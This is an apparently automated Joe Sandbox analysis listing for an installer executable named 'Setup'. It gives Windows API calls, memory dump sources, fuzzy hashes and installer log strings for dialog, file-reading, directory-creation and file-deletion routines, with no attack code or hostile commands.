                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                        • String ID: HideWindow
                                                                                                                                        • API String ID: 1249568736-780306582
                                                                                                                                        • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                        • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                                                                                                        • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                        • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
APIs
• MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
• SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
Memory Dump Source
• Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
• Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
• Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
• Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
APIs
• GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
• CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
Memory Dump Source
• Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
Similarity
• API ID: File$AttributesCreate
• String ID:
• API String ID: 415043291-0
• Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
• Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
• Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
• Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
APIs
• GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
• SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
Memory Dump Source
• Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
• Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
• Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
• Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
APIs
• ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
Memory Dump Source
• Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
• Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
• Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
• Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
APIs
  • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
  • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
  • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
  • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
• CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
Memory Dump Source
• Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
Similarity
• API ID: Char$Next$CreateDirectoryPrev
• String ID:
• API String ID: 4115351271-0
• Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
• Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
• Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
• Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
APIs
• SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
Memory Dump Source
• Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
• Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
• Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
• Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
                                                                                                                                        APIs
                                                                                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FilePointer
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 973152223-0
                                                                                                                                        • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                        • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                                                                                                        • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                        • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3850602802-0
                                                                                                                                        • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                        • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                                                                                                                        • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                        • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                                                                                                                        APIs
                                                                                                                                        • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CallbackDispatcherUser
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2492992576-0
                                                                                                                                        • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                        • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                                                                                                                        • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                        • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19
                                                                                                                                        APIs
                                                                                                                                        • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                                                                                        • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                                                                        • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                                                                        • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                                                                        • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                                                                        • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                                                                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                                                                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                                                                        • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                                                                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                                                                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                                                                        • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                                                                                        • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                                                                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                                                                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                                                                                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                                                                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                                                                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                                                                        • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                                                                                        • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                                                                        • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                                                                        • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                                                                                        • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                        • String ID: $ @$M$N
                                                                                                                                        • API String ID: 1638840714-3479655940
                                                                                                                                        • Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                        • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                                                                                                        • Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                        • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                                                                                                                        APIs
                                                                                                                                        • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                                                                                        • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                                                                        • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                                                                        • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                                                                                        • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                                                                                        • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                                                                        Strings
                                                                                                                                        • ptF, xrefs: 00406D1A
                                                                                                                                        • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                                                                        • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                                                                        • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                                                                        • \*.*, xrefs: 00406D2F
                                                                                                                                        • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                                                                        • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                                                                        • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                                                                        • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
Similarity
• API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
• String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
• API String ID: 2035342205-1650287579
• Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
• Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
• Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
• Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
APIs
• GetDlgItem.USER32(?,000003F0), ref: 00404525
• IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
• GetDlgItem.USER32(?,000003FB), ref: 00404553
• GetAsyncKeyState.USER32(00000010), ref: 0040455A
• GetDlgItem.USER32(?,000003F0), ref: 0040456F
• ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
• SetWindowTextW.USER32(?,?), ref: 004045AF
• SHBrowseForFolderW.SHELL32(?), ref: 00404669
• lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
• lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
• SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
• CoTaskMemFree.OLE32(00000000), ref: 00404674
  • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
  • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
  • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
  • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
  • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
  • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
• GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
• MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427976,759223A0,00000000), ref: 00406902
• SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
Strings
Memory Dump Source
• Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
Similarity
• API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
• String ID: F$A
• API String ID: 3347642858-1281894373
• Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
• Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
• Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
• Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
APIs
• CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
• ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
• ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
• lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
• lstrcmpA.KERNEL32(name,?), ref: 00406FF3
• CloseHandle.KERNEL32(?), ref: 00407212
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
Strings
Memory Dump Source
• Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmp
